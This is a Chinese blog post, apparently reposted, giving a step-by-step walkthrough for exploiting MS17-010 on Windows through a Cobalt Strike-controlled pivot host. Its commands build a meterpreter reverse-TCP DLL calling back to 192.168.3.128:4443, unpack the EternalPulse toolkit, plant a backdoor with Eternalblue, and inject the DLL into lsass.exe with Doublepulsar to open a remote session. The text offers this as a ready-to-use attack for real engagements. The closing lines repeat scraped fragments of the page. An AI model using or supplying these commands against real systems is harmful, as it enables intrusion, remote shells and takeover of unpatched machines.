MS17010原生打法[亲测有效]
Hi,大家好,我是编程小6,很荣幸遇见你,我把这些年在开发过程中遇到的问题或想法写出来,今天说一说MS17010原生打法[亲测有效],希望能够帮助你!!!。
1、针对入口跳板机已经CS上线但是因为目标所在区域代理出来的流量卡慢、扫描会导致代理隧道崩溃、MSF的17010不成功但是原生利用工具成功的场景。此工具是由最原版调用fb.py那版提取出来的(原生版是最为稳定,并且能利用的版本)。
项目地址:https://github.com/TolgaSEZER/EternalPulse
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.128 LPORT=4443 -f dll > x64.dll
![MS17010原生打法[亲测有效]_https://bianchenghao6.com/blog__第1张](https://img.mushiming.top/app/bianchenghao6_com/2023-05-25-3f5fb968ec0c48618c2d28ac6a6e7abe.jpg "MS17010原生打法[亲测有效]__第1张_编程好6博客")
2、将dll文件拷贝到EternalPulse工具目录下打包成zip,上传到cobaltstrike已控机器中。
![MS17010原生打法[亲测有效]_https://bianchenghao6.com/blog__第2张](https://img.mushiming.top/app/bianchenghao6_com/2023-05-25-5e4df2efde6545258ed75c10b4fe92d9.jpg "MS17010原生打法[亲测有效]__第2张_编程好6博客")
3、查看目标主机是否安装解压缩软件。
shell dir “C:\Program Files”
![MS17010原生打法[亲测有效]_https://bianchenghao6.com/blog__第3张](https://img.mushiming.top/app/bianchenghao6_com/2023-05-25-2c1d036bc4164bc3b56894e2eb640e90.jpg "MS17010原生打法[亲测有效]__第3张_编程好6博客")
4、解压缩工具包。
shell “C:\Program Files\7-Zip\7z.exe” x EternalPulse.zip -oc:\EternalPulse
或WinRAR:
“C:\Program Files\WinRAR\rar.exe” x c:\test\EternalPulse.rar c:\test
![MS17010原生打法[亲测有效]_https://bianchenghao6.com/blog__第4张](https://img.mushiming.top/app/bianchenghao6_com/2023-05-25-f1ebacc827074b22bf83d9b69c4fbde7.jpg "MS17010原生打法[亲测有效]__第4张_编程好6博客")
![MS17010原生打法[亲测有效]_https://bianchenghao6.com/blog__第5张](https://img.mushiming.top/app/bianchenghao6_com/2023-05-25-bf043a000c464ce7b4e9d66eec83025e.jpg "MS17010原生打法[亲测有效]__第5张_编程好6博客")
如果没有解压缩工具,给主机上传单个的rar.exe或7z.exe也可。
5、进入到解压缩后的工具目录。
![MS17010原生打法[亲测有效]_https://bianchenghao6.com/blog__第6张](https://img.mushiming.top/app/bianchenghao6_com/2023-05-25-4d9771cb3ab64de7b8d6146b653dee7a.jpg "MS17010原生打法[亲测有效]__第6张_编程好6博客")
6、种植后门。
Eternalblue-2.2.0.exe --InConfig Eternalblue-2.2.0.xml --TargetIp 存在17010漏洞的IP --TargetPort 445 --Target WIN72K8R2
(也可以不指定–Target)
![MS17010原生打法[亲测有效]_https://bianchenghao6.com/blog__第7张](https://img.mushiming.top/app/bianchenghao6_com/2023-05-25-c4c976b5bb324ab58ff4177b517e1410.jpg "MS17010原生打法[亲测有效]__第7张_编程好6博客")
7、msf开启监听。
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.3.128
set lport 4443
exploit -j
![MS17010原生打法[亲测有效]_https://bianchenghao6.com/blog__第8张](https://img.mushiming.top/app/bianchenghao6_com/2023-05-25-d564644fa92a41f39e1965f4e6826510.jpg "MS17010原生打法[亲测有效]__第8张_编程好6博客")
8、执行Doublepulsar-1.3.1.exe工具远程执行后门
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp 存在17010漏洞的IP --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload x64.dll --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60
![MS17010原生打法[亲测有效]_https://bianchenghao6.com/blog__第9张](https://img.mushiming.top/app/bianchenghao6_com/2023-05-25-bf086205304e449aae0e29c2bf9390d1.jpg "MS17010原生打法[亲测有效]__第9张_编程好6博客")
9、msf成功接收session。
![MS17010原生打法[亲测有效]_https://bianchenghao6.com/blog__第10张](https://img.mushiming.top/app/bianchenghao6_com/2023-05-25-0e320b2e1dde4e36b66b711d4372d43b.jpg "MS17010原生打法[亲测有效]__第10张_编程好6博客")
Ps:实战中应x32.dll,x64.dll都生成一份。使用Doublepulsar.exe的时候要写清参数的位数。dll在其他目录,也应指定好目录,如果没有cd到攻击程序文件夹路径的话,不光exe程序要指定绝对路径,同文件夹下的两个.xml文件也应指定绝对路径。
From:宅独青年
上一篇
已是最后文章
下一篇
已是最新文章
。项目地址:https://github.com/TolgaSEZER/EternalPulsemsfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.3.128LPORT=4443-fdll>x&desc=MS17010原生打法[亲测有效]1、针对入口跳板机已经CS上线但是因为目标所在区域代理出来的流量卡慢、扫描会导致代理隧道崩溃、MSF的17010不成功但是原生利用工具成功的场景。此工具是由最原版调用fb.py那版提取出来的(原生版是最为稳定,并且能利用的版本)。项目地址:https://github.com/TolgaSEZER/EternalPulsemsfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.3.128LPORT=4443-fdll>x){kind=link}
。项目地址:https://github.com/TolgaSEZER/EternalPulsemsfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.3.128LPORT=4443-fdll>x){kind=link}
